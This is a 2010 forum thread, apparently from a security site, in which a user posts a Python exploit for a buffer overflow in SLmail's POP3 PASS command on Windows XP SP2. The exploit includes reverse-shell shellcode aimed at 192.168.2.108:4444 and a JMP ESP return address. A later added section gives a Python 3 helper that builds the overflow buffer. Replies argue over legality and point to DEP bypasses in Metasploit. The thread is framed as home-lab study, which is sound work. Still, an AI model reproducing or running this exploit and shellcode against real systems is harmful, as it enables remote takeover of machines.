-
January 7th, 2010, 02:53 AM
#1
Junior Member
Please help
The target is an XP SP2 machine running an SLmail server, which I know is vulnerable to a buffer overflow in the PASS command. So I whipped up the following script:
#!/usr/bin/python
# Python 2: str is a byte string, so the "\x.." escapes below go on the wire as raw bytes.
import struct
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# payload bytes, kept exactly as posted (the embedded \xc0\xa8\x02\x6c and \x11\x5c
# are an IPv4 address and port in network byte order, i.e. 192.168.2.108:4444)
shellcode = ("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24" +
             "\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f" +
             "\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84" +
             "\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28" +
             "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c" +
             "\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
             "\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e" +
             "\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" +
             "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50" +
             "\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff" +
             "\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43" +
             "\x53\x43\x53\xff\xd0\x68\xc0\xa8\x02\x6c\x66\x68\x11\x5c" +
             "\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a" +
             "\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50" +
             "\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95" +
             "\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" +
             "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51" +
             "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" +
             "\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6" +
             "\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a" +
             "\x04\x5f\x53\xff\xd6\xff\xd0")

# where 0x01c7a18b is a JMP ESP in user32.dll on xp sp2
# buffer = '\x41' * 4654 + struct.pack('<L', 0x01c7a18b) + '\x90' * 16 + shellcode
# test buffer: 4654 bytes of padding, 4 B's that should land in EIP, 48 C's that should sit at ESP
buffer = '\x41' * 4654 + '\x42' * 4 + '\x43' * 48

print "\nSending evil buffer..."
s.connect(('192.168.2.104', 110))   # POP3
data = s.recv(1024)                  # banner
s.send('USER ftp' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')    # the overflow is in the handling of the PASS argument
data = s.recv(1024)
s.close()
The resulting crash shows my four B's sitting pretty in EIP, but when I pass the address of a JMP ESP in user32.dll (done in this case by changing the commented line), the resulting crash holds a different address in EIP, which does not point towards my shellcode.
I am certain that someone will point out my stupid mistake easily, but I have been working on this all day and still it does not work...
Thanks in advance for the help,
Ey3l45h
Last edited by ey3l45h; January 7th, 2010 at 04:17 PM.
Reason: I copied and pasted the wrong version of the script.
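As an added example (not part of the original post, and not the SLmail exploit itself), the following Python 3 helper performs the checks a practitioner would run before turning the four B's into a real return address: a Metasploit-style cyclic pattern with offset lookup, so the 4654-byte offset can be confirmed from the raw value the debugger shows in EIP; a bad-character check on the little-endian-packed address and on the payload (NUL, CR and LF are assumed to be bad because the PASS argument is one POP3 command line); and a check that the final PASS line carries exactly one terminator, since a CR/LF inside the buffer would cut the payload short. The address 0x01c7a18b, the offset 4654 and the 16-byte NOP sled are taken from the post only as inputs; the example makes no claim about whether that address is valid on the target, and the int3 stand-in payload is constructed for the demonstration.

```python
import string
import struct

# Assumed bad characters: NUL, plus CR and LF, which terminate a POP3 command line.
BAD_CHARS = b"\x00\x0a\x0d"


def cyclic_pattern(length):
    """Build a Metasploit-style pattern (Aa0Aa1...Aa9Ab0...): every 4-byte
    window is unique, so the value that lands in EIP identifies its offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern is only unique up to %d bytes" % len(out))


def offset_from_eip(pattern, eip_value):
    """Given the 32-bit value the debugger shows in EIP after the crash,
    return the offset of those four bytes in the pattern that was sent.
    The stack holds the value little-endian, so pack it the same way."""
    needle = struct.pack("<L", eip_value)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("0x%08x does not occur in the pattern" % eip_value)
    return idx


def find_bad_chars(data, bad=BAD_CHARS):
    """Return (index, byte) pairs for every byte of data that is in bad."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def address_is_clean(ret_addr, bad=BAD_CHARS):
    """True if the little-endian encoding of ret_addr contains no bad byte."""
    return not find_bad_chars(struct.pack("<L", ret_addr), bad)


def build_buffer(offset, ret_addr, shellcode, nop_sled=16, bad=BAD_CHARS):
    """Assemble padding + return address + NOP sled + payload, refusing to
    build anything whose address or payload contains a bad character."""
    if not address_is_clean(ret_addr, bad):
        raise ValueError("return address 0x%08x packs to a bad character" % ret_addr)
    hits = find_bad_chars(shellcode, bad)
    if hits:
        raise ValueError("payload has bad characters at offsets %r" % [i for i, _ in hits])
    return b"A" * offset + struct.pack("<L", ret_addr) + b"\x90" * nop_sled + shellcode


def pass_line(buf):
    """Frame the buffer as the POP3 PASS command the script sends; a CR/LF
    inside buf would end the command early and truncate the payload."""
    line = b"PASS " + buf + b"\r\n"
    if line.count(b"\r\n") != 1:
        raise ValueError("buffer contains a line terminator")
    return line


def eip_and_esp(buf, offset):
    """Split a built buffer the way the crash sees it: the 4 bytes that
    overwrite EIP, and the bytes that sit at ESP right after them."""
    return buf[offset:offset + 4], buf[offset + 4:]


if __name__ == "__main__":
    # 1. Send cyclic_pattern(5000) in place of the A's; the value the debugger
    #    would then show in EIP is reconstructed here from the pattern itself.
    pat = cyclic_pattern(5000)
    crash_eip = struct.unpack("<L", pat[4654:4658])[0]
    print("EIP 0x%08x -> offset %d" % (crash_eip, offset_from_eip(pat, crash_eip)))
    # 2. Build the real buffer with the address from the post and a stand-in payload.
    payload = b"\xcc" * 8   # int3 stand-in (constructed); replace with the real payload
    buf = build_buffer(4654, 0x01C7A18B, payload)
    eip, esp = eip_and_esp(buf, 4654)
    print("bytes that land in EIP: %s" % eip.hex())
    print("ESP starts with the NOP sled: %s" % (esp[:16] == b"\x90" * 16))
    print("PASS line length: %d" % len(pass_line(buf)))
```

If the value shown in EIP after sending the pattern is not found, the bytes were altered on the way in (a bad character or a transformation applied by the server), which is exactly the situation to rule out before blaming the JMP ESP address.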
-
January 7th, 2010, 12:19 PM
#2
You are obviously going to get banned if you don't remove that. While I am sure you are not going to read this, anyways - http://antionline.com/faq.php?faq=vb...eading_posting
Parth Maniar,
CISSP, CISM, CISA, SSCP
*Thank you GOD*
Greater the Difficulty, SWEETER the Victory.
Believe in yourself.
-
January 7th, 2010, 01:42 PM
#3
If he's the owner of the machine he's attempting this on, there isn't any law being broken. Wasn't asked in the best manner, but, if the machine is his, there shouldn't be an issue. Other than others here probably not wanting to answer since we have a corporate owner who has to be responsible for any problems on here. The staff here are generally into the stuff we do here (I mean the staff, the mods obviously have an interest) but their bosses, probably not heh.
-
January 7th, 2010, 03:54 PM
#4
Junior Member
@byte~ I am sorry, I did not see anywhere in the rules where it said that one could not post educational projects. Of course this is for practice on my home lab. If you could please link me to something which shows a rule I have broken, I would be the first to remove my post. Thanks for the flaming.
@gore~ I recognize that I could have worded that better. I have been a long-time reader of AO and this was my first post. If you have some advice which would help in the future, maybe some other forums which would be able to help, I would love to hear it.
The question still stands: I still don't know why the address I am entering is destroying the stack in such a way that I cannot get to my JMP ESP.
k thanx bye,
ey3l45h
-
January 7th, 2010, 04:01 PM
#5
Doesn't even look like the shell is sent to anything at all. It just looks like an unused string in this script to me.
-
January 7th, 2010, 04:16 PM
#6
Junior Member
@~Spec You are right, I was changing a few things and I am about to edit that... it did get sent in the script that I ran. I accidentally did not add it to the end of the commented line...
-
January 8th, 2010, 12:11 AM
#7
Not sure but can this be any service to you?
Data Execution Prevention (DEP) is a security feature included in modern Microsoft Windows operating systems that is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow, for example.
http://en.wikipedia.org/wiki/Data_Execution_Prevention
I believe metasploit has some wrappers to defeat this protection. Just convert script procedure to your code.
-
January 8th, 2010, 01:08 AM
#8
-
January 8th, 2010, 01:29 AM
#9
I didn't see a problem with it so I left it alone too. He owns the machine and is simply trying to learn something, and isn't breaking any laws since, again, the machine is his, so he can do with it what he likes. So I just left it alone to grow lol.
-
January 8th, 2010, 01:55 AM
#10
I run a ton of scans and exploits against VMs in my home network. I always figured if I had a problem, I could rely on the members of AO to help me out. Just because something could possibly be used for illegal purposes, doesn't mean that it is evil. One of my favorite past times is running exploits against systems, while performing a packet capture, and looking at the results. It is a good way to observe suspicious network activity. From what I can tell the OP doesn't have malicious intent, but is trying to learn how to write/launch exploit code, which in and of itself is not a bad thing. Maybe like learning how to fire a gun... ??
"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink."
-HST